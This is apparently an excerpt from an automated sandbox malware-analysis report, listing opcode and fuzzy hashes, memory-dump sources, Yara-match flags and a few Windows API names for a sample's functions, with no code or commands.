                                                                                                    • Opcode Fuzzy Hash: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
                                                                                                    • Instruction Fuzzy Hash: 763159759483819BD718CB34C8A13BBBBD19B97318F189A2DE0E193391D338C5468B5B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f60f5b64229c358e55dcfd8d7bb48be719f7f9c79ed88e3e4dbcafda2f6c3ce3
                                                                                                    • Instruction ID: 25bbddab7bdbe77e82873d1f94a5e1dab8127a28aac10402092a91f98cfda55d
                                                                                                    • Opcode Fuzzy Hash: f60f5b64229c358e55dcfd8d7bb48be719f7f9c79ed88e3e4dbcafda2f6c3ce3
                                                                                                    • Instruction Fuzzy Hash: 203137B59483918BD719CB34C8957AFBBD19FD3218F189A2CE4E193391D338C1068B57
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                                                                    • Instruction ID: c3ef201410797beedfbb423dd4b6a4b613f7a1191b873fa7b6aad00fbf48a4bb
                                                                                                    • Opcode Fuzzy Hash: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                                                                    • Instruction Fuzzy Hash: D3210B6590D3C146D7394B3A44243B7EFE25FE7345F2C58AED0D987392DA798005871A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                    • Instruction ID: b0168b037b63377ee53a696943b9184fc20a9d47a10823b489a3532680c59eb7
                                                                                                    • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                    • Instruction Fuzzy Hash: 7B314B2290D6F30EC336892D449047E7AA05AE621472943FFDCF19B3C3C52AC94587E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                    • Instruction ID: 6c8c8809c20559db4bc4a516f5a177c1791011529730bfd0b693d1db679dd909
                                                                                                    • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                    • Instruction Fuzzy Hash: 6331F52250D6F24EC737893D48900BDBAE49EA611972E83FEDCF18B793C611CA4593E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                                                    • Instruction ID: f625d5dc7cc146dca826755e11d0e3d06b3d9b76c6b30af6ca5c7fe59dabf8e9
                                                                                                    • Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                                                    • Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                                                    • Instruction ID: 13967e6f2c803aa1a1a6c944309c82d03a28efb781559ef1c51d83f02df6c23a
                                                                                                    • Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                                                    • Instruction Fuzzy Hash: E931A2B66187518BD718CF39C89136BBBE2AB86218F18DA6DE4D1D7284D73CC405CB52
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2aff2747913e61d8e485ec3db636ec536704eedd3d1794fbcb6d77b268cc3f13
                                                                                                    • Instruction ID: 19a3a508226153d38cb4f4c15706f4b1cb9d047627312e2c44de6146e97527c5
                                                                                                    • Opcode Fuzzy Hash: 2aff2747913e61d8e485ec3db636ec536704eedd3d1794fbcb6d77b268cc3f13
                                                                                                    • Instruction Fuzzy Hash: B2216D3980435B8BCB149F18D01067EF3F1FF59BA0F55841DD88257225EB74A9A9DBC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                                                                    • Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
                                                                                                    • Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                                                                    • Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0199799e75cbd837ee7f3b361dc18108ad832d3bad261f098223bc718b25986b
                                                                                                    • Instruction ID: e312ff633161b156593e809f3845c73e364d7f8f5b73fe0ab31dbbd1c4cb901f
                                                                                                    • Opcode Fuzzy Hash: 0199799e75cbd837ee7f3b361dc18108ad832d3bad261f098223bc718b25986b
                                                                                                    • Instruction Fuzzy Hash: 6921D1769583A04BE7358F359C953DBBBE2ABC2314F09C62CC8D967284DB760845CBC2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                    • Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                    • Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                    • Instruction ID: e2180d6939ef97b35e300699cc750bbe33d074bbde52667dca763eacebaaf8e1
                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                    • Instruction Fuzzy Hash: C511C633B052D40EC7168D3C8400679BFE30EE7135B598399E8F69B2D2C62289CA9750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                                                    • Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
                                                                                                    • Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                                                    • Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
                                                                                                    • Instruction ID: 0f38236eaaee22b7da2b5bc4df34116dba3f55fa6a5ce31650bb1b45a837fa69
                                                                                                    • Opcode Fuzzy Hash: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
                                                                                                    • Instruction Fuzzy Hash: 3D0184F1A4230187F7769E5484C0F77B2EA6F81714F18403ED81957A40DB76E805FB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
                                                                                                    • Instruction ID: 2c4a0144f11c3adfbc0c0d25d508bd6161842fe2bdc1dbecdeb46abdebbfa031
                                                                                                    • Opcode Fuzzy Hash: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
                                                                                                    • Instruction Fuzzy Hash: 81F0B43AA5D7504EE3048EE8D88436BFBD2EB81314F19947DC6C4A7581CAB998858B92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
                                                                                                    • Instruction ID: 1297f94070e8404878b490c822724cd8c2745456f7be635f230dcff9d5a20d1a
                                                                                                    • Opcode Fuzzy Hash: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
                                                                                                    • Instruction Fuzzy Hash: B8F0DC221183004F8B370E0988D03F8F3A30E8B206708916DD8D457589C630C549E75C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
                                                                                                    • Instruction ID: 8a7c6981feeee2ef6b0d5b231ad33d461476c5413a9107d0811da2445a05281e
                                                                                                    • Opcode Fuzzy Hash: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
                                                                                                    • Instruction Fuzzy Hash: 49F03AB1A0024ADFCB219F44C841AABB7B5FF86750F044459E8854B220E735C551EB56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
                                                                                                    • Instruction ID: 75f41a80bf9194e063656ca362a6978555f016786011b509f08bd69facf093c1
                                                                                                    • Opcode Fuzzy Hash: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
                                                                                                    • Instruction Fuzzy Hash: 06F0A932A193548FC310DF258A0036BF7E1BF82B04F48C868D4DA97210E238C5428756
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
                                                                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction ID: ef8fb3b17a14c6607711dd18323879e3793bcabfae2dbfe3c530c1150a1453d2
                                                                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                    • Instruction Fuzzy Hash: FCD097A05083A20E4789CF3804A083BFBF4E943112B28108FE0D1E3514C321D8019258
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
                                                                                                    • Instruction ID: ad7c06e57a303dba94bcd7d2aa197efc7e92ac1f9ab750114ca6719ae142e1d8
                                                                                                    • Opcode Fuzzy Hash: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
                                                                                                    • Instruction Fuzzy Hash: 77B048389482409B9604CF00E88042AF375AA8B200F14A418E84933310CA30E8008A89
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 1006321803-0
                                                                                                    • Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                                                    • Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
                                                                                                    • Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                                                    • Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 1006321803-0
                                                                                                    • Opcode ID: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
                                                                                                    • Instruction ID: f4f2bde3fcd5c3214975e6861c4a4d1256f5e0b68f433e1065fdb7f3a523764d
                                                                                                    • Opcode Fuzzy Hash: b6f01c0c97fb55c4f760d8dbc247883c75a3a53b097895858b7026296001245f
                                                                                                    • Instruction Fuzzy Hash: 26418D7110C3818FD711EF7894483AEBFE19B86314F09492DE4D68B391D7798588EBA3
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: $%$p:#$MO
                                                                                                    • API String ID: 237503144-3521940197
                                                                                                    • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
                                                                                                    • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 020D5884
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: $%$p:#$MO
                                                                                                    • API String ID: 237503144-3521940197
                                                                                                    • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction ID: f4ed0c16a1b8118f6c1e66d5182a1b7068d27deff6ba7c7810069e50066b890a
                                                                                                    • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                                                                    • Instruction Fuzzy Hash: 6A41AE765583448BE310CF25C89475FBBE2FBC5758F16892CE4D49B680C6B9CA0A8B86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: #v
                                                                                                    • API String ID: 3664257935-554117064
                                                                                                    • Opcode ID: 27da7d1ecd683459e61e314d26d97e783c391c34258efece46d9df52749a6e00
                                                                                                    • Instruction ID: 0ef2ccba0a006ca6fcd7738bd7119b4b32ceb5ba17d334e5b7befb7630811a2c
                                                                                                    • Opcode Fuzzy Hash: 27da7d1ecd683459e61e314d26d97e783c391c34258efece46d9df52749a6e00
                                                                                                    • Instruction Fuzzy Hash: 07C04C3D810404DFEF117FB7FE098183AB1FB4273A3140834F40241036DA264921EB1D